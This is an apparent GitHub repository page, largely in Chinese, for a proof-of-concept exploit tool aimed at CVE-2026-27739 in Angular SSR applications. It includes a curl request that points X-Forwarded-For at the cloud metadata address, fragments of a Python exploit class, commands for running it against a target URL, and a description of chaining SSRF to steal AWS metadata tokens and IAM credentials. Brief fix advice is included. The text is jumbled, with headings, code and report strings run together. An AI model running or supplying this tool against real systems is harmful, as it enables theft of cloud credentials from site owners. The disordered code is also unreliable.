bankerke/-CVE-2026-27739-poc

GitHub: bankerke/-CVE-2026-27739-poc

针对 Angular SSR 应用的 SSRF 和原型链污染漏洞 PoC 工具,支持云元数据窃取和自动化渗透报告生成。

Stars: 0 | Forks: 0

# CVE-2026-27739-poc curl -H "X-Forwarded-For: http://169.254.169.254/latest/meta-data/" {self.target} ### 2. 通过原型链污染进行 Header 注入 (CVSS: 7.5) **描述**: Angular SSR 处理不安全的查询参数,影响原型链 **影响**: 请求头篡改,潜在的 SSRF 链式攻击 ## 修复建议 1. 移除/禁用 X-Forwarded-* 请求头处理或对已知代理进行白名单限制 2. 在易受 SSRF 攻击的操作前执行严格的 URL 验证 3. 使用 `express-validator` 或类似工具进行请求头清洗 4. 禁用 AWS/GCP 元数据端点或使用配置了跳数限制的 IMDSv2 """ print(report) with open("angular_ssr_exploit_report.txt", "w") as f: f.write(report) def main(): parser = argparse.ArgumentParser(description="Angular SSR SSRF & Header Injection Exploit") parser.add_argument("target", help="Target Angular SSR application URL") parser.add_argument("--no-ssl-verify", action="store_true", help="Disable SSL verification") ``` args = parser.parse_args() exploit = AngularSSRExploit(args.target, ssl_verify=not args.no_ssl_verify) print(f"[+] Targeting: {args.target}") print(f"[+] SSL Verify: {'Disabled' if args.no_ssl_verify else 'Enabled'}") # 执行漏洞利用链 exploit.test_header_injection() exploit.exploit_ssrf_chain() exploit.extract_sensitive_data() exploit.generate_report() ``` if __name__ == "__main__": main() 用法 bash # 基础 SSRF 测试 python3 angular_ssr_exploit.py https://target.com # 跳过自签名证书的 SSL 验证 python3 angular_ssr_exploit.py https://target.com --no-ssl-verify 工作原理 Header 注入测试: 发送原型链污染 payload 以及 Angular SSR 可能不安全处理的不安全转发请求头 SSRF 链式攻击: 通过 X-Forwarded-For/X-Original-URL 测试对 AWS IMDS、GCP 元数据和本地服务的访问 IMDSv2 Token 提取: 将 SSRF 链接起来以窃取 AWS 元数据 token,进而获取 IAM 凭证 自动化报告: 生成包含 CVSS 评分和 PoC 的渗透测试报告 技术细节 根本原因: Angular Universal SSR 应用通常直接将 req.headers 转发给内部 API 而未进行清洗: javascript // 易受攻击的 Angular SSR 模式 app.get('*', (req, res) => { const url = req.headers['x-original-url'] || req.originalUrl; // SSRF internalFetch(url, { headers: req.headers }); // Header injection });
标签:Angular SSR, AWS IMDSv2, CISA项目, CVE-2026-27739, CVSS 7.5, Express安全, Header Injection, HTTP头注入, IP 地址批量处理, PoC, Python, SSRF, StruQ, X-Forwarded-For, 元数据窃取, 原型污染, 反向代理, 无后门, 暴力破解, 服务端请求伪造, 逆向工具, 防御绕过